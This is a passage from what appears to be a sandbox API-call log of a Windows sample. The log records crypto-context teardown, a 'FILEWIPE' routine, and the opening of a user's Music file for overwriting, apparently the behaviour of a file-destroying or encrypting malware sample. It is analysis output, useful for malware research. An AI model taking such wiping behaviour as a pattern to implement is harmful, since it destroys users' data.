hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.394] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.394] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.394] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.395] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.395] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.395] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.395] CryptDestroyKey (hKey=0x7c2200) returned 1 [0038.396] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.396] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.396] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.396] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.396] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.396] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.396] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.396] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.396] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.396] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.396] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.396] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.396] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.396] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.397] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.397] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.397] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.397] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.397] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.397] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0038.398] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.398] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.398] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0038.398] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.398] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.398] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.400] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.400] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.400] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.400] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.400] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858f4c0, ftCreationTime.dwHighDateTime=0x1d5c04d, ftLastAccessTime.dwLowDateTime=0xae3b6570, ftLastAccessTime.dwHighDateTime=0x1d5bfbd, ftLastWriteTime.dwLowDateTime=0xae3b6570, ftLastWriteTime.dwHighDateTime=0x1d5bfbd, nFileSizeHigh=0x0, nFileSizeLow=0x28f2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s65Zb6gGvH2opWaFb.m4a", cAlternateFileName="S65ZB6~1.M4A")) returned 0x7c2240 [0038.400] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.400] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.400] CharLowerBuffW (in: lpsz="byte[10482]", cchLength=0xb | out: lpsz="byte[10482]") returned 0xb [0038.400] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.400] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.401] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.401] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.401] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.401] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.402] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.402] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.402] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.403] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.403] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\s65zb6ggvh2opwafb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.403] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.404] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.404] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.404] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.404] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.404] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.404] WideCharToMultiByte (in: CodePage=0x0, 